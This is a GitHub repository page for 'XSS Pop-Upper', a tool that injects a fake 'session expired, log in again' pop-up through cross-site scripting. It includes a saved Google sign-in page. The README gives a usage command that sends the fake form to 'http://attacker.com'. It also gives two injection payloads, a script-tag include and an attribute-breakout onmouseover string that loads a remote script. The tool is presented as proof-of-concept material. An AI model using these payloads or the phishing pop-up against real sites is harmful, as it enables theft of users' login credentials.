This Javascript file creates a pop-up for your XSS PoC.
HTML JavaScript Python
Switch branches/tags
Nothing to show
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Failed to load latest commit information.
Sign in - Google Accounts_files gm xss popupper added Sep 1, 2016
.gitignore first commit Jun 30, 2016
README.md Update README.md Jan 10, 2017
export.js first commit Jun 30, 2016
gm.html added enter Sep 1, 2016
payload.js added enter Sep 1, 2016
template.js first commit Jun 30, 2016
test.html added enter Sep 1, 2016
test.js gm xss popupper added Sep 1, 2016
xss-popupper.py first commit Jun 30, 2016

README.md

XSS Pop-Upper

This Javascript file creates a pop-up for your XSS PoC.

Usage

python xss-popupper.py --url "http://attacker.com" --title "Log-in for session" --body "Your session has expired. Please log-in again" --time 5000

Inject

  • For HTML Element:
    <script src=http://export.js></script>
  • For Element Attribute:
    "onmouseover="x=document.createElement('script');x.src='export.js';document.getElementsByTagName('head')[0].appendChild(x)